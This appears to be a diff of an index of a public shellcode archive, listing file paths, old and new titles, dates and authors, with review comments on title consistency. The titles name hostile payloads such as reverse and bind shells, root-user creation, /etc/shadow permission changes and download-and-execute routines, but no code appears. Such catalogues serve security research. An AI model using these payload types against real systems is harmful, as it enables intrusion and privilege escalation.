345 13688 shellcodes/linux_x86-64/13688.c Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) 2010-04-25 zbt shellcode linux_x86-64
346 13691 shellcodes/linux_x86-64/13691.c Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) 2010-04-25 zbt shellcode linux_x86-64
347 13692 shellcodes/linux_x86/13692.c Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes) 2010-04-25 condis shellcode linux_x86
348 13697 shellcodes/linux_x86/13697.c Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes) 2010-05-04 Jonathan Salwan shellcode linux_x86
349 13698 shellcodes/linux_x86/13698.c Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes) 2010-05-05 Jonathan Salwan shellcode linux_x86
350 13699 shellcodes/windows_x86/13699.txt Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode 2010-05-10 Crack_MaN shellcode windows_x86
351 13702 shellcodes/linux_x86/13702.c Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes) 2010-05-17 Jonathan Salwan shellcode linux_x86
352 13703 shellcodes/linux_x86/13703.txt Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
353 13704 shellcodes/solaris_x86/13704.c Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
354 13707 shellcodes/solaris_x86/13707.c Solaris/x86 - Halt Shellcode (36 bytes) 2010-05-20 Jonathan Salwan shellcode solaris_x86
355 13709 shellcodes/solaris_x86/13709.c Solaris/x86 - Reboot() Shellcode (37 bytes) 2010-05-21 Jonathan Salwan shellcode solaris_x86
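Review bot: the three "PEB method" rows (13525, 13526, 13527) end up inconsistently capitalised: 13526 becomes "PEB Method" while 13525 and 13527 keep "PEB method" in their new titles. Pick one form for all three. In the same hunk, 13523 is retitled but keeps the misspelling "Administartor", and 13682 keeps "setreud"; both rows are already touched by this change, so the spelling can be fixed here rather than in a follow-up.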
357 13712 shellcodes/linux_x86/13712.c Linux/x86 - Disable ASLR Security Shellcode (106 bytes) 2010-05-25 Jonathan Salwan shellcode linux_x86
358 13715 shellcodes/linux_x86/13715.c Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes) 2010-05-27 agix shellcode linux_x86
359 13716 shellcodes/linux_x86/13716.c Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes) 2010-05-27 agix shellcode linux_x86
360 13719 shellcodes/windows_x86-64/13719.txt Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes) Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes) 2010-05-28 agix shellcode windows_x86-64
361 13722 shellcodes/linux_x86/13722.c Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes) 2010-05-31 antrhacks shellcode linux_x86
362 13723 shellcodes/linux_x86/13723.c Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes) Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
363 13724 shellcodes/linux_x86/13724.c Linux/x86 - Kill All Running Process Shellcode (11 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
364 13725 shellcodes/linux_x86/13725.txt Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes) Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
365 13726 shellcodes/linux_x86/13726.txt Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) 2010-05-31 gunslinger_ shellcode linux_x86
366 13728 shellcodes/linux_x86/13728.c Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes) 2010-06-01 gunslinger_ shellcode linux_x86
367 13729 shellcodes/windows_x86-64/13729.txt Windows 7 x64 - cmd Shellcode (61 bytes) Windows/x86-64 (7) - cmd Shellcode (61 bytes) 2010-06-01 agix shellcode windows_x86-64
368 13730 shellcodes/linux_x86/13730.c Linux/x86 - unlink /etc/shadow Shellcode (33 bytes) Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes) 2010-06-02 gunslinger_ shellcode linux_x86
369 13731 shellcodes/linux_x86/13731.c Linux/x86 - Hard Reboot Shellcode (29 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
370 13732 shellcodes/linux_x86/13732.c Linux/x86 - Hard Reboot Shellcode (33 bytes) 2010-06-03 gunslinger_ shellcode linux_x86
371 13733 shellcodes/solaris/13733.c Solaris/x86 - SystemV killall Command Shellcode (39 bytes) 2010-06-03 Jonathan Salwan shellcode solaris
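Review bot: the sys_ prefix is only partly normalised in rows 352-366. The new titles for 13726 and 13728 drop it from every call (13728 becomes "setuid(0) + setgid(0) + execve(/bin/sh)"), but the new titles for 13703, 13723 and 13725 still carry "sys_umask(14)" and "sys_chmod syscall". Suggest applying one rule to all of them so that a title search on a syscall name returns the same set before and after. Also worth checking while here: row 13733 is titled Solaris/x86 but sits under shellcodes/solaris/ with platform "solaris", whereas 13704, 13707 and 13709 use solaris_x86.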
377 13908 shellcodes/linux_x86-64/13908.c Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
378 13910 shellcodes/linux_x86/13910.c Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
379 13915 shellcodes/linux_x86-64/13915.txt Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
380 13943 shellcodes/linux_x86-64/13943.c Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes) 2010-06-20 Jonathan Salwan shellcode linux_x86-64
381 14014 shellcodes/windows_x86/14014.pl shellcodes/generator/14014.pl Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator) 2010-06-24 d0lc3 shellcode windows_x86 generator
382 14116 shellcodes/arm/14116.txt Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes) 2010-06-29 Jonathan Salwan shellcode arm
383 14052 shellcodes/windows/14052.c Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes) 2010-06-25 RubberDuck shellcode windows
384 14097 shellcodes/arm/14097.c Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes) 2010-06-28 Jonathan Salwan shellcode arm
389 14190 shellcodes/arm/14190.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes) 2010-07-03 Jonathan Salwan shellcode arm
390 14216 shellcodes/linux_x86/14216.c Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes) 2010-07-05 Magnefikko shellcode linux_x86
391 14218 shellcodes/linux/14218.c Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes) 2010-07-05 gunslinger_ shellcode linux
392 14219 shellcodes/linux/14219.c Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes) Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes) 2010-07-05 gunslinger_ shellcode linux
393 14221 shellcodes/windows/14221.html Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode 2010-07-05 Alexey Sintsov shellcode windows
394 14234 shellcodes/linux_x86/14234.c Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes) 2010-07-05 gunslinger_ shellcode linux_x86
395 14235 shellcodes/linux_x86/14235.c Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes) 2010-07-05 gunslinger_ shellcode linux_x86
396 14261 shellcodes/generator/14261.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator) 2010-07-07 Jonathan Salwan shellcode generator
397 14276 shellcodes/linux_x86/14276.c Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes) 2010-07-08 gunslinger_ shellcode linux_x86
398 14288 shellcodes/windows_x86/14288.asm Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes) Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni shellcode windows_x86
399 14305 shellcodes/linux_x86-64/14305.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) 2010-07-09 10n1z3d shellcode linux_x86-64
400 14332 shellcodes/linux_x86/14332.c Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes) 2010-07-11 blake shellcode linux_x86
401 14691 shellcodes/linux_x86/14691.c Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes) 2010-08-19 Aodrulez shellcode linux_x86
402 14697 shellcodes/windows/14697.c Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes) Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes) 2010-08-20 Glafkos Charalambous shellcode windows
403 14795 shellcodes/bsd_x86/14795.c BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes) 2010-08-25 beosroot shellcode bsd_x86
404 14873 shellcodes/windows_x86/14873.asm Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes) Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes) 2010-09-02 2010-09-01 dijital1 shellcode windows_x86
405 14907 shellcodes/arm/14907.c Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes) 2010-09-05 Jonathan Salwan shellcode arm
406 15063 shellcodes/windows_x86/15063.c Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) 2010-09-20 ZoRLu shellcode windows_x86
407 15116 shellcodes/arm/15116.cpp Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode 2010-09-26 Celil Ünüver shellcode arm
408 15136 shellcodes/windows/15136.cpp Windows Mobile 6.5 TR - Phone Call Shellcode Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode 2010-09-27 Celil Ünüver shellcode windows
409 15202 shellcodes/windows_x86/15202.c Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
410 15203 shellcodes/windows_x86/15203.c Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
411 15314 shellcodes/arm/15314.asm Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
412 15315 shellcodes/arm/15315.asm Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
413 15316 shellcodes/arm/15316.asm Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15317 shellcodes/arm/15317.asm Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
415 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
416 15618 shellcodes/osx/15618.c OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
417 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) 2010-12-09 Jonathan Salwan shellcode generator
418 15879 shellcodes/windows_x86/15879.txt Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode 2010-12-31 Skylined shellcode windows_x86
419 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
420 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
421 16283 shellcodes/windows_x86/16283.txt Windows x86 - Eggsearch Shellcode (33 bytes) Windows/x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode windows_x86
422 17432 shellcodes/superh_sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode superh_sh4
423 17194 shellcodes/linux_x86/17194.txt Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode linux_x86
424 17224 shellcodes/osx/17224.s OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2011-04-29 hammackj shellcode osx
425 17323 shellcodes/windows/17323.c Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) 2011-05-25 RubberDuck shellcode windows
426 20195 shellcodes/linux_x86/20195.c Linux/x86 - Disable ASLR Security Shellcode (83 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
427 17326 shellcodes/generator/17326.rb Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit) Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit) 2011-05-26 Alexey Sintsov shellcode generator
428 17371 shellcodes/linux_x86/17371.c Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan shellcode linux_x86
429 17439 shellcodes/superh_sh4/17439.c Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes) 2011-06-23 Jonathan Salwan shellcode superh_sh4
430 17545 shellcodes/windows_x86/17545.txt Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) 2011-07-18 KaHPeSeSe shellcode windows_x86
431 17559 shellcodes/linux_x86/17559.c Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes) 2011-07-21 Ali Raheem shellcode linux_x86
432 17564 shellcodes/osx/17564.asm OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode 2011-07-24 pa_kt shellcode osx
433 17940 shellcodes/linux_mips/17940.c Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes) 2011-10-07 entropy shellcode linux_mips
434 17996 shellcodes/generator/17996.c Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator) 2011-10-18 entropy shellcode generator
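Review bot: the new title for row 17545 has a stray space before the closing parenthesis, "Windows/x86 (PerfectXp-pc1/SP3 )"; it should read "(PerfectXp-pc1/SP3)" to match the other retitled rows. In the same block, row 15136 is retitled "Windows/ARM (Mobile 6.5 TR)" but its path stays shellcodes/windows/15136.cpp and its platform column stays "windows", while the sibling row 15116 with the same "Windows/ARM" prefix lives under shellcodes/arm/ with platform "arm". Either move 15136 to match or note why the two differ.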
438 18197 shellcodes/linux_x86-64/18197.c Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) 2011-12-03 X-h4ck shellcode linux_x86-64
439 18226 shellcodes/linux_mips/18226.c Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes) 2011-12-10 rigan shellcode linux_mips
440 18227 shellcodes/linux_mips/18227.c Linux/MIPS - reboot() Shellcode (32 bytes) 2011-12-10 rigan shellcode linux_mips
441 18294 shellcodes/linux_x86/18294.c Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode 2011-12-31 pentesters.ir shellcode linux_x86
442 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan shellcode linux_x86
443 18585 shellcodes/linux_x86-64/18585.s Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) 2012-03-12 0_o shellcode linux_x86-64
444 18885 shellcodes/linux_x86/18885.c Linux/x86 - execve(/bin/dash) Shellcode (42 bytes) 2012-05-16 X-h4ck shellcode linux_x86
446 21252 shellcodes/arm/21252.asm Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2012-09-11 midnitesnake shellcode arm
447 21253 shellcodes/arm/21253.asm Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes) 2012-09-11 midnitesnake shellcode arm
448 21254 shellcodes/arm/21254.asm Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes) 2012-09-11 midnitesnake shellcode arm
449 40363 shellcodes/windows_x86/40363.c Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) 2016-09-13 Roziul Hasan Khan Shifat shellcode windows_x86
450 22489 shellcodes/windows/22489.cpp Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) 2012-11-05 b33f shellcode windows
451 40890 shellcodes/windows_x86-64/40890.c Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) 2016-12-08 Roziul Hasan Khan Shifat shellcode windows_x86-64
452 23622 shellcodes/linux_x86/23622.c Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) 2012-12-24 Hamza Megahed shellcode linux_x86
453 24318 shellcodes/windows/24318.c Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode 2013-01-24 RubberDuck shellcode windows
454 25497 shellcodes/linux_x86/25497.c Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes) 2013-05-17 Russell Willis shellcode linux_x86
455 40387 shellcodes/hardware/40387.nasm Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes) Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes) 2016-09-16 Sean Dillon shellcode hardware
456 27132 shellcodes/linux_mips/27132.txt Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) 2013-07-27 Jacob Holcomb shellcode linux_mips
457 27180 shellcodes/arm/27180.asm Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode 2013-07-28 Matthew Graeber shellcode arm
458 40827 shellcodes/linux_x86/40827.c Linux/x86 - Egghunter Shellcode (31 bytes) Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes) 2016-11-25 Filippo Bersani shellcode linux_x86
459 28474 shellcodes/linux_x86/28474.c Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode 2013-09-23 Ryan Fenno shellcode linux_x86
460 40334 shellcodes/windows_x86/40334.c Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes) Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes) 2016-09-05 Roziul Hasan Khan Shifat shellcode windows_x86
461 28996 shellcodes/windows/28996.c Windows - MessageBox Null-Free Shellcode (113 bytes) Windows - MessageBox + Null-Free Shellcode (113 bytes) 2013-10-16 Giuseppe D'Amore shellcode windows
462 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
463 40352 shellcodes/windows_x86/40352.c Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode windows_x86
464 33836 shellcodes/windows/33836.txt Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes) Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
465 34060 shellcodes/linux_x86/34060.c Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode linux_x86
466 34262 shellcodes/linux_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode linux_x86
467 34592 shellcodes/linux_x86/34592.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) 2014-09-09 Ali Razmjoo shellcode linux_x86
468 34667 shellcodes/linux_x86-64/34667.c Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) 2014-09-15 MadMouse shellcode linux_x86-64
469 34778 shellcodes/linux_x86/34778.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) 2014-09-25 Javier Tejedor shellcode linux_x86
470 35205 shellcodes/linux_x86-64/35205.txt Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) 2014-11-10 Breaking.Technology shellcode linux_x86-64
471 35519 shellcodes/linux_x86/35519.txt Linux/x86 - rmdir Shellcode (37 bytes) Linux/x86 - rmdir() Shellcode (37 bytes) 2014-12-11 kw4 shellcode linux_x86
472 35586 shellcodes/linux_x86-64/35586.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
473 35587 shellcodes/linux_x86-64/35587.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
474 35793 shellcodes/windows_x86/35793.txt Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86
475 35794 shellcodes/windows_x86-64/35794.txt Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86-64
476 35868 shellcodes/linux_mips/35868.c Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes) 2015-01-22 Sanguine shellcode linux_mips
477 36411 shellcodes/generator/36411.txt Windows XP x86-64 - Download File + Execute Shellcode (Generator) Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) 2015-03-16 Ali Razmjoo shellcode generator
478 36274 shellcodes/linux_mips/36274.c Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
479 36276 shellcodes/linux_mips/36276.c Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
480 36359 shellcodes/linux_x86-64/36359.c Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) 2014-03-27 Chris Higgins shellcode linux_x86-64
481 36391 shellcodes/linux_x86/36391.c Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
482 36393 shellcodes/linux_x86/36393.c Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
483 36394 shellcodes/linux_x86/36394.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
484 36395 shellcodes/linux_x86/36395.c Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes) Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
485 36397 shellcodes/linux_x86/36397.c Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
486 36398 shellcodes/linux_x86/36398.c Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
487 36637 shellcodes/linux_x86/36637.c Linux/x86 - Disable ASLR Security Shellcode (84 bytes) 2015-04-03 Mohammad Reza Ramezani shellcode linux_x86
488 36672 shellcodes/linux_x86/36672.asm Linux/x86 - Egghunter Shellcode (20 bytes) Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes) 2015-04-08 Paw Petersen shellcode linux_x86
489 36673 shellcodes/generator/36673.py Linux/x86 - Typewriter Shellcode (Generator) 2015-04-08 Paw Petersen shellcode generator
490 36701 shellcodes/linux_x86/36701.c Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes) Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes) 2015-04-10 Mohammad Reza Ramezani shellcode linux_x86
491 36750 shellcodes/linux_x86/36750.c Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes) Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes) 2015-04-14 Febriyanto Nugroho shellcode linux_x86
492 36778 shellcodes/linux_x86/36778.c Linux/x86 - execve(/bin/sh) Shellcode (35 bytes) 2015-04-17 Mohammad Reza Espargham shellcode linux_x86
